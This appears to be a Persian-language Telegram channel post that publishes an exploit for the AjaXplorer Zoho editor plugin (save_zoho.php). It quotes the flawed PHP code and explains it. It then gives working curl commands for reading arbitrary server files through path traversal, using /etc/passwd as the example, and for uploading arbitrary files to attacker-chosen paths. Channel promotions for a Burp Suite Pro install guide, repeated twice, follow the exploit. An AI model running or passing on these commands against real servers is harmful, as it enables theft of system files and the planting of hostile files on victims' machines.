<?php
$vars = array_merge($_GET, $_POST);
if(!isSet($vars["ajxp_action"]) && isset($vars["id"]) && isset($vars["format"])){
$filezoho = $_FILES['content']["tmp_name"];
$cleanId = str_replace(array("..", "/"), "", $vars["id"]);
move_uploaded_file($filezoho, "files/".$cleanId.".".$vars["format"]);
}else if($vars["ajxp_action"] == "get_file" && isSet($vars["name"])){
if(file_exists("files/".$vars["name"])){
readfile("files/".$vars["name"]);
unlink("files/".$vars["name"]);
}
}
?>
➖➖➖➖➖➖➖➖➖➖
#~Options :
گزینه ها :
option 1 :
اگر ajxp_action تنظیم (ست) نشده باشد، فایل content رو به قسمت files/id.format اپلود کنید.
در این مورد کد قبل از اینکه فرمت فایل ها رو چک کنه فایل رو به عنوان یک ارگومان به بخش move_uploded_file میده .
که این میتونه فرصتی برای اپلود فایل خودتون باشه...
نکته : برای اینکه توانایی موارد بالا رو داتشه باشید باید کاربر دسترسی لازم برای ادیت فایل رو داشته باشه.
option 2 :
اگر ajxp_action در بخش get_file تنظیم شده باشد (ست شده باشد)، شما میتوانید فایل رو از files/name بخوانید و بخش مد نظر رو حذف کنید !
که در این حالت دوباره کد نمیتونه پارامتر name رو تشخیص بده که این موردم میتونه باگ باشه.
➖➖➖➖➖➖➖➖➖➖
#~Filesdirectory's :
ادرس فایل :
ادرس پیشفرض فایل ها :
/plugins/editor.zoho/agent/files
ادرس پیشفرض برای خواندن فایل های اپلود شده :/plugins/editor.zoho/data/files/
➖➖➖➖➖➖➖➖➖➖#~Read arbitrary files :
نحوه ی خواندن فایل :
curl "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=<file_relative_path>"
مانند :
"http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=../../../../../../../../etc/passwd"
➖➖➖➖➖➖➖➖➖➖
#~Arbitrary File Upload :
نحوه ی اپلود فایل دلخواه :
curl -F 'content=@<filename_from_attacker_host>;type=<filetype>;filename=\"<filename>\"' "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?id=&format=<upload_to_file_relative_path>"
مانند :
curl -F 'content=@test.html;type=text/html;filename=\"test.html\"' "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?id=&format=./../../../data/files/test.html"
➖➖➖➖➖➖➖➖➖➖
با تشکر از همراهان عزیز.
Software link
Exploit link
————————————-
@LearnExploit - 0DayBoy 's in Iran :)
Telegram
AttachLearnExploit
🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
اموزش نحوه ی نصب Burp Suite Pro روی ویندوز 10 ::
(طبق توضیحات و عکس پیش برید دوستان )
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
➖➖➖➖➖➖➖➖➖➖
اموزش نحوه ی نصب Burp Suite Pro روی ویندوز 10 ::
(طبق توضیحات و عکس پیش برید دوستان )
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit